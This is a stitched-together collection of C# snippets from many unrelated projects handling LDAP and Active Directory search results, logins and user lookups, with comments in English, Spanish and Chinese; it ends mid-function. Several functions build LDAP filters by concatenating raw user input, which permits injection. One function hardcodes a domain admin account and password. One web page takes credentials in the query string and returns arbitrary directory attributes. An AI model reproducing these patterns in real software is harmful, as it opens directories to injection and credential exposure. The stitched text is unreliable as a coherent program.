private static List<string> GetMemberGroupsFromSearchResult(SearchResult searchResult)
{
List<string> memberGroups = new List<string>();
// loop through groups
foreach (object properties in searchResult.Properties["memberOf"])
{
string property = properties.ToString();
// The following is used to remove the cn= etc...
int equalsIndex = property.IndexOf("=", 1);
int commaIndex = property.IndexOf(",", 1);
if (equalsIndex == -1)
{
return null;
}
if (equalsIndex > -1)
{
//New user group name found in Active Directory: " + userGroupName
//Get group name
string userGroupName = property.Substring((equalsIndex + 1), (commaIndex - equalsIndex) - 1);
memberGroups.Add(userGroupName);
}
}
if (memberGroups.Count == 0)
{
//No user group names found in Active Directory.
//The client may not have permission to read member groups for the specified user.
}
return memberGroups;
}
private Principal MapToPrincipal(SearchResult searchResult)
{
using (DirectoryEntry directoryEntry = searchResult.GetDirectoryEntry())
{
return Principal.FromDirectoryEntry(directoryEntry, additionalPropertyNames);
}
}
public bool isValidMailID(String mailID)
{
try
{
System.DirectoryServices.DirectoryEntry dirEntry = new System.DirectoryServices.DirectoryEntry("LDAP://SukantaServer");
System.DirectoryServices.DirectorySearcher dirSearcher = new System.DirectoryServices.DirectorySearcher(dirEntry);
dirSearcher.Filter = "(SAMAccountName=" + mailID + ")";
System.DirectoryServices.SearchResult result = dirSearcher.FindOne();
if (result != null)
{
return(true);
}
else
{
return(false);
}
}
catch (Exception ex)
{
//throw new Exception("User not authenticated: " + ex.Message);
return(false);
}
}
public SortedList<string, PropertyCollection> GetSortedUsers(SearchResult group)
{
SortedList<string, PropertyCollection> result = new SortedList<string, PropertyCollection>();
try
{
foreach (Object memberColl in group.Properties["member"])
{
string strmemberColl = memberColl.ToString().ToLower();
if (strmemberColl.Contains("ou=sh") || strmemberColl.Contains("ou=store"))
{
DirectoryEntry objUserEntry = new DirectoryEntry("LDAP://" + memberColl, "cnadic\\spsadmin", "ciicit#4%6", AuthenticationTypes.Secure);
//objUserEntry.RefreshCache();
PropertyCollection userProps = objUserEntry.Properties;
objUserEntry.Close();
if (!string.IsNullOrEmpty(userProps["displayName"].Value + ""))
{
result.Add(userProps["displayName"].Value.ToString(), userProps);
}
}
//object obVal = userProps["displayName"].Value;
//object obAcc = userProps["sAMAccountName"].Value;
}
}
catch (Exception e)
{
throw e;
}
return result;
}
/// <summary>
/// Este metoo autentica elusuario pero no espesifica el error. Tal como lo hace User_Logon retornando LoginResult
/// </summary>
/// <param name="LDAPPath">url ldap o coneccion ldap perteneciente al dominio</param>
/// <param name="domainName">Nombre de dominio</param>
/// <param name="username">Nombre de usuario</param>
/// <param name="pwd">password</param>
/// <returns></returns>
public static bool User_Logon_IsAuthenticated(string LDAPPath, string domainName, string username, string pwd)
{
string domainAndUsername = String.Concat(domainName + @"\" + username);
try
{
DirectoryEntry Entry = new DirectoryEntry(LDAPPath, username, pwd, AuthenticationTypes.Secure);
DirectorySearcher searcher = new DirectorySearcher(Entry);
searcher.SearchScope = SearchScope.OneLevel;
System.DirectoryServices.SearchResult results = searcher.FindOne();
if (results != null)
{
return(true);
}
}
catch (Exception ex)
{
TechnicalException te = new Fwk.Exceptions.TechnicalException(ex.Message);
LDAPHelper.SetError(te);
te.ErrorId = "15004";
throw te;
}
return(false);
}
/// <summary>
/// This method will create the address information object
/// </summary>
/// <param name="ldapResults">The search results to create the object with</param>
/// <param name="properties">The properties required.</param>
/// <returns>The new address object.</returns>
/// <exception cref="InvalidOperationException">If LDAP provider has raised an COM exception</exception>
private static IAddress CreateAddress(SearchResult ldapResults, List<string> properties)
{
Hashtable hh = SearchForProperties(ldapResults, properties);
string displayName = "";
string adsPath = "";
string email = "";
ClassType ct = ClassType.Object;
if (hh.ContainsKey("cn") && hh["cn"] != null)
{
if (hh["cn"].GetType() == typeof(string))
displayName = "";
else
displayName = ((ResultPropertyValueCollection)hh["cn"])[0].ToString();
}
if (hh.ContainsKey("adspath") && hh["adspath"] != null)
{
adsPath = ((ResultPropertyValueCollection)hh["adspath"])[0].ToString();
// Now remove the server entry from the path
if (adsPath.LastIndexOf("/") > -1)
adsPath = adsPath.Substring(adsPath.LastIndexOf("/") + 1);
}
if (hh.ContainsKey("mail") && hh["mail"] != null)
{
if (hh["mail"].GetType() == typeof(string))
email = hh["mail"].ToString();
else
email = ((ResultPropertyValueCollection)hh["mail"])[0].ToString();
if (email.Length == 0)
email = adsPath;
}
if (hh.ContainsKey("objectclass") && hh["objectclass"] != null)
{
ResultPropertyValueCollection rp = hh["objectclass"] as ResultPropertyValueCollection;
foreach (string classType in rp)
{
switch (classType.ToLower(System.Threading.Thread.CurrentThread.CurrentCulture))
{
case "organizationalperson":
case "dominoperson":
ct = ClassType.User;
break;
case "dominogroup":
case "group":
ct = ClassType.Group;
break;
}
if (ct != ClassType.Object)
break;
}
}
Address ad = new Address(email, displayName, adsPath);
ad.LdapType = ct;
return (IAddress)ad;
}
/// <summary>
/// Converts a SearchResult returned from a query to the active directory store into
/// an ActiveDirectoryContact including the setting of the Manager & Manages properties
/// when the withManagerAndManages parameter is set to true.
/// </summary>
/// <param name="result">Object returned from query to active directory store.</param>
/// <param name="withManagerAndManages">Flag indicating whether to set Manager & Manages property.</param>
/// <returns>Contact with properties populated.</returns>
private ActiveDirectoryContact ConvertSearchResultToContact(SearchResult result, bool withManagerAndManages)
{
if (result == null)
return null;
var contact = new ActiveDirectoryContact();
contact.DistinguishedName = GetProperty(result, "distinguishedName");
contact.FirstName = GetProperty(result, "givenName");
contact.LastName = GetProperty(result, "sn");
contact.Username = GetProperty(result, "cn");
contact.Telephone = GetProperty(result, "telephoneNumber");
contact.Email = GetProperty(result, "mail");
contact.Company = GetProperty(result, "company");
contact.DisplayName = GetProperty(result, "displayName");
contact.Office = GetProperty(result, "physicalDeliveryOfficeName");
contact.Mobile = GetProperty(result, "mobile");
contact.JobRole = GetProperty(result, "title");
contact.Fax = GetProperty(result, "facsimileTelephoneNumber");
contact.HomePhoneNumber = GetProperty(result, "ipPhone");
contact.IpPhoneNumber = GetProperty(result, "facsimileTelephoneNumber");
contact.Pager = GetProperty(result, "pager");
if (withManagerAndManages)
return AddManagerHeirachies(contact, result);
return contact;
}
public SearchResultWrapper(SearchResult searchResult)
{
if(searchResult == null)
throw new ArgumentNullException("searchResult");
this._searchResult = searchResult;
}
/// <summary>
/// Searches the result property.
/// </summary>
/// <param name="sr">The sr.</param>
/// <param name="field">The field.</param>
/// <returns></returns>
private static String SearchResultProperty(SearchResult sr, string field)
{
if (sr.Properties[field] != null)
{
return (String)sr.Properties[field][0];
}
return null;
}
/// <summary>
/// Retrieves the user information.
/// </summary>
/// <param name="userNameToRetrieveFrom">The user name to retrieve from.</param>
/// <returns></returns>
/// <remarks></remarks>
public LdapUserInfo RetrieveUserInformation(string userNameToRetrieveFrom)
{
System.DirectoryServices.DirectorySearcher ldapSearcher = new System.DirectoryServices.DirectorySearcher();
System.DirectoryServices.SearchResult ldapResult = default(System.DirectoryServices.SearchResult);
string filter = "(&(objectClass=user)(SAMAccountName=" + userNameToRetrieveFrom + "))";
System.DirectoryServices.DirectoryEntry ldap = default(System.DirectoryServices.DirectoryEntry);
try
{
if (LdapLogonUserName == null)
{
ldap = new System.DirectoryServices.DirectoryEntry("LDAP://" + DomainName);
}
else
{
ldap = new System.DirectoryServices.DirectoryEntry("LDAP://" + DomainName, LdapLogonUserName, LdapLogonPassword);
}
}
catch (Exception e)
{
Util.Log.Trace(e.ToString());
throw new CruiseControlException("Problem connecting to LDAP service", e);
}
ldapSearcher.SearchRoot = ldap;
ldapSearcher.SearchScope = SearchScope.Subtree;
ldapSearcher.PropertiesToLoad.Add(LdapFieldMailAddress);
ldapSearcher.PropertiesToLoad.Add(LdapFieldName);
ldapSearcher.PropertiesToLoad.Add(LdapFieldSurName);
ldapSearcher.PropertiesToLoad.Add(LdapFieldCommonName);
ldapSearcher.PropertiesToLoad.Add(LdapFieldGivenName);
ldapSearcher.PropertiesToLoad.Add(LdapFieldDisplayName);
ldapSearcher.PropertiesToLoad.Add(LdapFieldMailNickName);
ldapSearcher.Filter = filter;
ldapResult = ldapSearcher.FindOne();
ldapSearcher.Dispose();
LdapUserInfo result = new LdapUserInfo();
if ((ldapResult != null))
{
result.CommonName = (string)ldapResult.GetDirectoryEntry().Properties[LdapFieldCommonName].Value;
result.DisplayName = (string)ldapResult.GetDirectoryEntry().Properties[LdapFieldDisplayName].Value;
result.GivenName = (string)ldapResult.GetDirectoryEntry().Properties[LdapFieldGivenName].Value;
result.MailAddress = (string)ldapResult.GetDirectoryEntry().Properties[LdapFieldMailAddress].Value;
result.MailNickName = (string)ldapResult.GetDirectoryEntry().Properties[LdapFieldMailNickName].Value;
result.Name = (string)ldapResult.GetDirectoryEntry().Properties[LdapFieldName].Value;
result.SurName = (string)ldapResult.GetDirectoryEntry().Properties[LdapFieldSurName].Value;
}
return(result);
}
private static byte[] GetPropertyByteArray(SearchResult result, string propertyName)
{
byte[] returnValue = null;
if (result.Properties[propertyName].Count > 0)
{
returnValue = result.Properties[propertyName][0] as byte[];
}
return returnValue;
}
private void button2_Click(object sender, EventArgs e)
{
DirectoryEntry de = new DirectoryEntry("LDAP://global.ds.honeywell.com");
DirectorySearcher ds = new DirectorySearcher();
ds.Filter = "(SAMAccountName=h387015)";
ds.PropertiesToLoad.Add("mail");
System.DirectoryServices.SearchResult sr = ds.FindOne();
}
internal override void Reset()
{
this.endReached = false;
this.current = null;
if (this.enumerator != null)
{
this.enumerator.Reset();
}
}
private static string GetPropertyString(SearchResult result, string propertyName)
{
var returnValue = string.Empty;
if (result.Properties[propertyName].Count > 0)
{
returnValue = result.Properties[propertyName][0].ToString();
}
return returnValue;
}
public static object GetSearchResultPropertyValue(SearchResult res, string propertyName)
{
ResultPropertyValueCollection values = null;
values = res.Properties[propertyName];
if ((values == null) || (values.Count < 1))
{
throw new ProviderException(System.Web.SR.GetString("ADMembership_Property_not_found", new object[] { propertyName }));
}
return values[0];
}
static string GetProperty(SearchResult searchResult, string PropertyName)
{
if (searchResult.Properties.Contains(PropertyName))
{
return searchResult.Properties[PropertyName][0].ToString();
}
else
{
return string.Empty;
}
}
public List<string> GetAllProperty(SearchResult result, string PropertyName)
{
List<string> Values = new List<string>();
if (result.Properties.Contains(PropertyName))
{
foreach (var m in result.Properties[PropertyName])
{
Values.Add(m.ToString());
}
}
return Values;
}
internal override bool MoveNext()
{
bool flag = this.enumerator.MoveNext();
if (!flag)
{
this.endReached = true;
}
else
{
this.current = (SearchResult)this.enumerator.Current;
}
return flag;
}
public static string GetUserInitials(SearchResult result)
{
string initials = string.Empty;
if (result != null && result.Properties["initials"] != null && result.Properties["initials"].Count > 0)
{
var inits = result.Properties["initials"];
if (inits != null && inits.Count > 0)
initials = result.Properties["initials"][0].ToString();
}
return initials;
}
private int GetAsInt(SearchResult result, string name)
{
int i = 0;
try
{
i = (int)result.Properties[name][0];
}
catch
{
}
return i;
}
private string GetAsString(SearchResult result, string name)
{
var s = String.Empty;
try
{
s = result.Properties[name][0] as string;
}
catch
{
}
return s;
}
public static string GetProperty(SearchResult srSearchResult, string strPropertyName)
{
string result = string.Empty;
if (srSearchResult.Properties.Contains(strPropertyName))
{
result = srSearchResult.Properties[strPropertyName][0].ToString();
}
else
{
result = "Attribute not found";
}
return result;
}
private static object EnumEntryItemCallBack(SearchResult sr, ADSearchResultParams asrp, object oParams, ref bool bContinue)
{
AD2DBTransferContext context = (AD2DBTransferContext)oParams;
context.InitialParams.OnBeforeProcessADObject(sr, context.InitialParams, ref bContinue);
if (bContinue)
{
string objName = ADHelper.GetInstance().GetSearchResultPropertyStrValue("name", sr);
string objClass = AD2DBHelper.TranslateObjectClass(sr.Properties["objectClass"][1].ToString());
ADHelper helper = ADHelper.GetInstance();
FillContext(context,
ADHelper.GetParentRdnSequence(helper.GetSearchResultPropertyStrValue("distinguishedName", sr)));
try
{
switch (objClass)
{
case "ORGANIZATIONS":
InsertOrganizations(sr, context);
context.OrganizationsConverted++;
break;
case "USERS":
InsertUser(sr, context);
InsertOUUser(sr, context);
InsertUsersInfoExtend(sr, context);
context.UsersConverted++;
break;
default:
break;
}
UpdateParentChildrenCounter(context);
}
catch (System.Exception ex)
{
string strMsg = string.Format("转换对象\"{0}\"出错,{1}", objName, ex.Message + ex.StackTrace);
context.InitialParams.Log.Write(strMsg);
}
}
return null;
}
private static PC.SchemaObjectBase MeargeChanges(System.DirectoryServices.SearchResult searchResult, PC.SchemaObjectBase schemaObjectBase)
{
PC.SCUser user = (PC.SCUser)schemaObjectBase;
if (searchResult.Properties.Contains("msRTCSIP-PrimaryUserAddress"))
{
user.Properties.SetValue("Sip", searchResult.Properties["msRTCSIP-PrimaryUserAddress"][0].ToString());
}
if (searchResult.Properties.Contains("mail"))
{
user.Properties.SetValue("Mail", searchResult.Properties["mail"][0].ToString());
}
return(schemaObjectBase);
}
protected void Page_Load(object sender, System.EventArgs e)
{
Response.ClearContent();
if ((Request.QueryString["user"] == null) || (Request.QueryString["password"] == null) || (Request.QueryString["properties"] == null))
{
Response.Write("-1");
Response.End();
return;
}
string user = Request.QueryString["user"].ToString().Trim();
string password = Request.QueryString["password"].ToString().Trim();
try
{
string domain = "ecas.local";
System.DirectoryServices.DirectoryEntry entry = new System.DirectoryServices.DirectoryEntry("LDAP://" + domain, user, password, System.DirectoryServices.AuthenticationTypes.Secure);
try
{
System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(entry);
search.Filter = "(SAMAccountName=" + user + ")";
search.PropertiesToLoad.Add("displayName");
System.DirectoryServices.SearchResult result = search.FindOne();
if (result == null)
{
Response.Write("-1");
Response.End();
return;
}
string properties = Request.QueryString["properties"].ToString().Trim();
string nombre = result.Properties[properties][0].ToString();
Response.Write(nombre);
Response.End();
return;
}
catch (System.DirectoryServices.DirectoryServicesCOMException)
{
Response.Write("-1");
Response.End();
}
}
catch (System.DirectoryServices.DirectoryServicesCOMException)
{
Response.Write("-1");
Response.End();
}
}
public AdUser(SearchResult user)
{
Name = GetAsString(user, @"sAMAccountName").ToLower();
DisplayName = GetAsString(user, @"displayName");
Email = GetAsString(user, @"mail");
Telephone = GetAsString(user, @"telephoneNumber");
Fax = GetAsString(user, @"facsimileTelephoneNumber");
StreetAddress = GetAsString(user, @"streetAddress");
City = GetAsString(user, @"l");
State = GetAsString(user, @"st");
CountryCode = ISO3166.ToA2(GetAsInt(user, @"countryCode"), null);
PostalCode = GetAsString(user, @"postalCode");
WwwHomepage = GetAsString(user, @"wWWHomePage");
Title = GetAsString(user, @"title");
Company = GetAsString(user, @"company");
PhysicalDeliveryOfficeName = GetAsString(user, @"physicalDeliveryOfficeName");
}
private static bool IsDifferent(System.DirectoryServices.SearchResult item, SimpleUser entity)
{
bool same = true;
if (item.Properties.Contains("mail") && item.Properties["mail"][0].ToString() != entity.Mail)
{
same = false;
}
else
{
if (item.Properties.Contains("msRTCSIP-PrimaryUserAddress") && item.Properties["msRTCSIP-PrimaryUserAddress"][0].ToString() != entity.Sip)
{
same = false;
}
}
return(!same);
}
public bool IsAuthenticated(string Domain, string username, string pwd)
{
bool Success = false;
DirectoryEntry Entry = new DirectoryEntry(Domain, username, pwd);
DirectorySearcher Searcher = new DirectorySearcher(Entry);
Searcher.SearchScope = SearchScope.OneLevel;
try
{
System.DirectoryServices.SearchResult Results = Searcher.FindOne();
Success = (Results != null);
}
catch
{
Success = false;
}
return(Success);
}
// Advance the enumerator to the next principal in the result set, pulling in additional pages
// of results as needed.
// Returns true if successful, false if no more results to return.
override internal bool MoveNext()
{
GlobalDebug.WriteLineIf(GlobalDebug.Info, "ADEntriesSet", "MoveNext");
Debug.Assert(_enumerator != null);
bool f = _enumerator.MoveNext();
if (f)
{
_current = (SearchResult)_enumerator.Current;
}
else
{
_endReached = true;
}
return f;
}
/// <summary>
/// Adds the ActiveDirectoryContact that represents the Manager and a list of
/// ActiveDirectoryContacts that represent the contacts that the contact
/// inputted manages.
/// </summary>
/// <param name="contact">Contact that should have its Manages and Manager properties
/// fulfilled.</param>
/// <param name="result">Object returned from a query to the active directory store.</param>
/// <returns>Contact with values set of Manages and Manager.</returns>
private ActiveDirectoryContact AddManagerHeirachies(ActiveDirectoryContact contact, SearchResult result)
{
if (contact == null)
return null;
var managerDn = GetProperty(result, "manager");
var managesDns = GetListProperty(result, "directReports");
if (!string.IsNullOrWhiteSpace(managerDn))
contact.Manager = GetContactByDistinguishedName(managerDn, false);
if (managesDns != null && managesDns.Count > 0)
{
contact.Manages = new List<ActiveDirectoryContact>();
foreach (var dn in managesDns)
contact.Manages.Add(GetContactByDistinguishedName(dn, false));
}
return contact;
}
private void BindSearchResult(SearchResult sr, TreeNode parent)
{
ADHelper helper = GetADHelper();
string name = helper.GetSearchResultPropertyStrValue("displayName", sr);
if (name.IsNullOrEmpty())
name = helper.GetSearchResultPropertyStrValue("name", sr);
TreeNode node = new TreeNode();
node.Text = name;
node.Tag = helper.GetSearchResultPropertyStrValue("distinguishedName", sr);
parent.Nodes.Add(node);
string objectClass = AD2DBHelper.TranslateObjectClass(sr.Properties["objectClass"][1].ToString());
int imageIndex = 0;
switch (objectClass)
{
case "ORGANIZATIONS":
node.Nodes.Add(CreateFakeNode());
break;
case "USERS":
imageIndex = 1;
if (helper.GetUserAccountPolicy(sr).UserAccountDisabled)
imageIndex = 3;
break;
case "GROUPS":
imageIndex = 2;
break;
}
node.ImageIndex = imageIndex;
node.SelectedImageIndex = imageIndex;
}
/// <summary>
/// This method will return the properties from the container for the common name object
/// specified.
/// </summary>
/// <param name="searcher">The LDAP search container</param>
/// <param name="propertyNames">An array of property name to search for</param>
/// <returns>The properties found</returns>
/// <exception cref="InvalidOperationException">If LDAP provider has raised an COM exception</exception>
protected static Hashtable SearchForProperties(SearchResult searcher, ArrayList propertyNames)
{
Hashtable properties = new Hashtable();
foreach (string prop in propertyNames)
{
properties.Add(prop, "");
}
try
{
foreach (string str in searcher.Properties.PropertyNames)
{
if (properties.ContainsKey(str))
{
if (str == "objectclass")
{
StringBuilder sb = new StringBuilder();
for (int i = 0; i < searcher.Properties[str].Count; i++)
{
sb.AppendFormat("{0},", searcher.Properties[str][i]);
}
properties[str] = sb.ToString();
}
else
{
properties[str] = searcher.Properties[str][0];
}
}
}
}
catch (COMException e)
{
StringBuilder err = new StringBuilder();
err.AppendFormat("Cannot search LDAP provider specified!{0}{0}{1}",
Environment.NewLine, e.Message);
throw new InvalidOperationException(err.ToString(), e);
}
return properties;
}
private void GetADProperties(System.DirectoryServices.SearchResult result)
{
if (result.Properties.Count > 0)
{
//System.Collections.ICollection nameList = this.searchResult.Properties.PropertyNames;
//System.Collections.ICollection valueList = this.searchResult.Properties.Values;
foreach (System.Collections.DictionaryEntry item in this.searchResult.Properties)
{
//var itemKey = item.Key;
//var itemValue = item.Value;
System.Collections.ReadOnlyCollectionBase valueList = ((System.Collections.ReadOnlyCollectionBase)(item.Value));
foreach (var valuekey in valueList)
{
//Assign prop to List<string, string>
if (ADProperties.Where(x => x.Key == item.Key).Count() == 0)
{
ADProperties.Add(Convert.ToString(item.Key), Convert.ToString(valuekey));
}
}
}
}
}
private static void UpdateTelephoneContact(Employee employee, eTelephoneContactType contactDetailType, SearchResult searchResult, string field,
string displayName)
{
if (searchResult.Properties[field].Count > 0)
{
TelephoneContact officeContact =
(TelephoneContact)
employee.ContactCard.FirstOrDefault(
tc =>
tc.ContactDetailType == eContactDetailType.ContactNumber &&
tc.DisplayName.Equals(displayName));
if (officeContact == null)
{
officeContact = new TelephoneContact()
{
DisplayName = displayName,
TelephoneType = contactDetailType
};
employee.ContactCard.Add(officeContact);
}
officeContact.SetNumber(searchResult.Properties[field][0].ToString());
}
}
private string GetProperty(AD.SearchResult searchResult, string PropertyName)
{
string resultado;
string otroValor;
resultado = string.Empty;
foreach (string propertyKey in searchResult.Properties.PropertyNames)
{
AD.ResultPropertyValueCollection valueCollection = searchResult.Properties[propertyKey];
foreach (var propertyValue in valueCollection)
{
if (propertyKey == PropertyName)
{
resultado = propertyValue.ToString();
}
else
{
otroValor = propertyValue.ToString();
}
}
}
return(resultado);
}
private static void SyncGroupMembers(IGroup oguGroup, SearchResult adGroup, SynchronizeContext context)
{
using (DirectoryEntry adEntry = adGroup.GetDirectoryEntry())
{
try
{
var members = adEntry.Properties["member"];
members.Clear();
AddGroupMembers(oguGroup.Members.ToIDList(), members, context);
adEntry.CommitChanges();
}
catch (Exception ex)
{
context.ExceptionCount++;
LogHelper.WriteSynchronizeDBLogDetail(SynchronizeContext.Current.SynchronizeID, "修改群组成员", oguGroup.ID, oguGroup.Name,
context.ADHelper.GetPropertyStrValue("objectGuid", adEntry),
context.ADHelper.GetPropertyStrValue("distinguishedName", adEntry),
string.Format("修改群组成员时出错:" + ex.Message));
}
}
}
protected DirectoryData CreateDirectoryDataFromSearchResult(SearchResult result)
{
if (result == null)
{
return null;
}
var properties = new Dictionary<string, string[]>(this._propertiesToLoad.Count);
foreach (string propName in this._propertiesToLoad)
{
if (result.Properties.Contains(propName))
{
var propVal = result.Properties[propName];
var values = new string[propVal.Count];
for (int i = 0; i < propVal.Count; i++)
{
values[i] = propVal[i].ToString();
}
properties.Add(propName, values);
}
}
return new DirectoryData(DistinguishedName(properties), SchemaClassName(properties), properties);
}
public ActionResult LoginSNHQAD()
{
string UserName = PageReq.GetForm("userName");
string PassWord = PageReq.GetForm("passWord");
string rememberMe = PageReq.GetForm("rememberMe");
string remember = "";
PageJson json = new PageJson();
#region 判断是否停用
if (AllowToLogin() == false)
{
json.Success = false;
json.Message = "误操作,请联系技术支持工程师,电话0592-3385501";
json.AddInfo("ReturnUrl", "");
return(Json(json));
}
#endregion
if (!string.IsNullOrEmpty(rememberMe))
{
remember = "on";
}
DataOperation dataOp = new DataOperation();
string ReturnUrl = PageReq.GetParam("ReturnUrl");
DirectoryEntry AD = new DirectoryEntry();
BsonDocument user = dataOp.FindOneByKeyVal("SysUser", "loginName", UserName);
if (user == null)
{
json.Success = false;
json.Message = "用户名不存在";
json.AddInfo("ReturnUrl", ReturnUrl.ToString());
return(Json(json));
}
if (user.Int("status") == 2)
{
json.Success = false;
json.Message = "用户已经被锁定";
json.AddInfo("ReturnUrl", ReturnUrl.ToString());
return(Json(json));
}
AD.Path = string.Format("LDAP://{0}", SysAppConfig.LDAPName);
AD.Username = SysAppConfig.ADName + @"\" + UserName;
AD.Password = PassWord;
AD.AuthenticationType = AuthenticationTypes.Secure;
try
{
DirectorySearcher searcher = new DirectorySearcher(AD);
searcher.Filter = String.Format("(&(objectCategory=CN=Person,CN=Schema,CN=Configuration,DC=suning,DC=com,DC=cn)(samAccountName={0}))", UserName);
System.DirectoryServices.SearchResult result = searcher.FindOne();
if (result != null)
{
if (user != null)
{
this.SetUserLoginInfo(user, remember); //记录用户成功登录的信息
if (string.IsNullOrEmpty(ReturnUrl) || ReturnUrl == "/" || ReturnUrl == "/default.aspx")
{
ReturnUrl = SysAppConfig.IndexUrl;
}
json.Success = true;
json.Message = "登录成功";
json.AddInfo("ReturnUrl", ReturnUrl.ToString());
}
else
{
json.Success = false;
json.Message = "用户名或密码错误";
json.AddInfo("ReturnUrl", ReturnUrl.ToString());
}
}
else
{
json.Success = false;
json.Message = "密码错误";
json.AddInfo("ReturnUrl", ReturnUrl.ToString());
}
AD.Close();
}
catch (Exception ex)
{
json.Success = false;
json.Message = "密码错误";
json.AddInfo("ReturnUrl", "");
}
return(Json(json));
}
public string validarUsuario(string usuario, string clave, string dominio)
{
dominio = (dominio == "") ? "GRUPORANSA" : dominio;
string rpta = "";
AccesoUsuarioOutput usuarios = new AccesoUsuarioOutput();
DirectoryEntry domain = new DirectoryEntry("LDAP://" + dominio);
using (DirectorySearcher Searcher = new DirectorySearcher(dominio))
{
//Searcher.Filter = "(&(objectCategory=user)(ANR=" + usuario + " * ))"; // busca todas las cuentas que se parezcan
Searcher.Filter = "(SAMAccountName=" + usuario + ")"; // "(SAMAccountName=" & usuario & ")"; // filtra por usuario especifico
Searcher.SearchScope = SearchScope.Subtree; // Start at the top and keep drilling down
Searcher.PropertiesToLoad.Add("sAMAccountName"); // Load User ID
Searcher.PropertiesToLoad.Add("displayName"); // Load Display Name
Searcher.PropertiesToLoad.Add("givenName"); // Load Users first name
Searcher.PropertiesToLoad.Add("sn"); // Load Users last name
Searcher.PropertiesToLoad.Add("distinguishedName"); // Users Distinguished name
Searcher.PropertiesToLoad.Add("proxyAddresses"); // correo del usuario
Searcher.PropertiesToLoad.Add("department"); // area de trabajo
Searcher.PropertiesToLoad.Add("title"); // rol del usuario
Searcher.PropertiesToLoad.Add("userAccountControl"); // Users Distinguished name
Searcher.Sort.PropertyName = "sAMAccountName"; // Sort by user ID
Searcher.Sort.Direction = System.DirectoryServices.SortDirection.Ascending; // A-Zt)
using (var users = Searcher.FindAll()) // Users contains our searh results
{
if (users.Count > 0)
{
foreach (SearchResult User in users) // goes throug each user in the search resultsg
{
variablesGlobales._estCuentaUsuario = Convert.ToInt32(User.Properties["userAccountControl"][0]);
int flagExists = variablesGlobales._estCuentaUsuario & 0x2;
if (flagExists > 0)
{
usuarios.IDUSER = 0;
usuarios.USERNM = "La cuenta de usuario se encuentra deshabilitada";
usuarios.NVLACC = "SIN ACCESO";
usuarios.PERMISOS = new List <CE_AccesosUsuario>();
rpta = JsonConvert.SerializeObject(usuarios);
}
System.DirectoryServices.DirectoryEntry Entry = new System.DirectoryServices.DirectoryEntry("LDAP://" + dominio, usuario, clave);
System.DirectoryServices.DirectorySearcher valSearcher = new System.DirectoryServices.DirectorySearcher(Entry);
valSearcher.SearchScope = System.DirectoryServices.SearchScope.OneLevel;
try
{
System.DirectoryServices.SearchResult Results = valSearcher.FindOne();
}
catch (Exception ex)
{
//rpta = "[{id=0, mensaje = '"+ ex.Message + "'}]";
rpta = "{\"id\":0, \"mensaje\": \"" + ex.Message + "\"}";
return(rpta);
}
if (User.Properties.Contains("displayName"))
{
variablesGlobales._NombreUsuario = System.Convert.ToString(User.Properties["displayName"][0]);
}
variablesGlobales._rolUsuario = (User.Properties["title"].Count > 0) ? System.Convert.ToString(User.Properties["title"][0]) : "";
variablesGlobales._dptoUsuario = (User.Properties["department"].Count > 0) ? System.Convert.ToString(User.Properties["department"][0]) : "";
variablesGlobales._correoUsuario = (User.Properties["proxyAddresses"].Count > 0) ? System.Convert.ToString(User.Properties["proxyAddresses"][0]) : "";
variablesGlobales._cuentaUsuario = (User.Properties["sAMAccountName"].Count > 0) ? System.Convert.ToString(User.Properties["sAMAccountName"][0]).ToUpper() : "";
usuarios = ValidarAccesos(variablesGlobales._cuentaUsuario);
rpta = JsonConvert.SerializeObject(usuarios);
}
}
else
{
usuarios.IDUSER = 0;
usuarios.USERNM = "No EXiste";
usuarios.NVLACC = "SIN ACCESO";
usuarios.PERMISOS = new List <CE_AccesosUsuario>();
rpta = JsonConvert.SerializeObject(usuarios);
}
}
}
return(rpta);
}
private void InitializePropertiesFromSchemaContainer()
{
if (!this.propertiesFromSchemaContainerInitialized)
{
if (this.schemaEntry == null)
{
this.schemaEntry = DirectoryEntryManager.GetDirectoryEntry(this.context, WellKnownDN.SchemaNamingContext);
}
this.propertyValuesFromServer = GetPropertiesFromSchemaContainer(this.context, this.schemaEntry, this.isDefunctOnServer ? this.commonName : this.ldapDisplayName, this.isDefunctOnServer);
this.propertiesFromSchemaContainerInitialized = true;
}
}
internal ActiveDirectorySchemaProperty(DirectoryContext context, string commonName, SearchResult propertyValuesFromServer, DirectoryEntry schemaEntry)
{
this.syntax = ~ActiveDirectorySyntax.CaseExactString;
this.rangeLower = null;
this.rangeUpper = null;
this.linkId = null;
this.context = context;
this.schemaEntry = schemaEntry;
this.propertyValuesFromServer = propertyValuesFromServer;
this.propertiesFromSchemaContainerInitialized = true;
this.propertyEntry = this.GetSchemaPropertyDirectoryEntry();
this.commonName = commonName;
this.ldapDisplayName = (string) this.GetValueFromCache(PropertyManager.LdapDisplayName, true);
this.isDefunctOnServer = true;
this.isDefunct = this.isDefunctOnServer;
this.isBound = true;
}
static string GetActiveDirectoryProperty(SearchResult result, string value)
{
ResultPropertyValueCollection resultProperties = result.Properties[value];
if (resultProperties.Count == 1)
return resultProperties[0] as string;
else
return string.Empty;
}
public string validarUsuario(string usuario, string clave, string dominio)
{
string rpta = "";
DirectoryEntry domain = new DirectoryEntry(dominio);
//DirectoryEntry domain = new DirectoryEntry("LDAP://" + dominio);
using (DirectorySearcher Searcher = new DirectorySearcher(dominio))
{
//Searcher.Filter = "(&(objectCategory=user)(ANR=" + usuario + " * ))"; // busca todas las cuentas que se parezcan
Searcher.Filter = "(SAMAccountName=" + usuario + ")"; // "(SAMAccountName=" & usuario & ")"; // filtra por usuario especifico
Searcher.SearchScope = SearchScope.Subtree; // Start at the top and keep drilling down
Searcher.PropertiesToLoad.Add("sAMAccountName"); // Load User ID
Searcher.PropertiesToLoad.Add("displayName"); // Load Display Name
Searcher.PropertiesToLoad.Add("givenName"); // Load Users first name
Searcher.PropertiesToLoad.Add("sn"); // Load Users last name
Searcher.PropertiesToLoad.Add("distinguishedName"); // Users Distinguished name
Searcher.PropertiesToLoad.Add("proxyAddresses"); // correo del usuario
Searcher.PropertiesToLoad.Add("department"); // area de trabajo
Searcher.PropertiesToLoad.Add("title"); // rol del usuario
Searcher.PropertiesToLoad.Add("userAccountControl"); // Users Distinguished name
Searcher.Sort.PropertyName = "sAMAccountName"; // Sort by user ID
Searcher.Sort.Direction = System.DirectoryServices.SortDirection.Ascending; // A-Zt)
using (var users = Searcher.FindAll()) // Users contains our searh results
{
if (users.Count > 0)
{
foreach (SearchResult User in users) // goes throug each user in the search resultsg
{
//Ambito._estCuentaUsuario = Convert.ToInt32(User.Properties["userAccountControl"][0]);
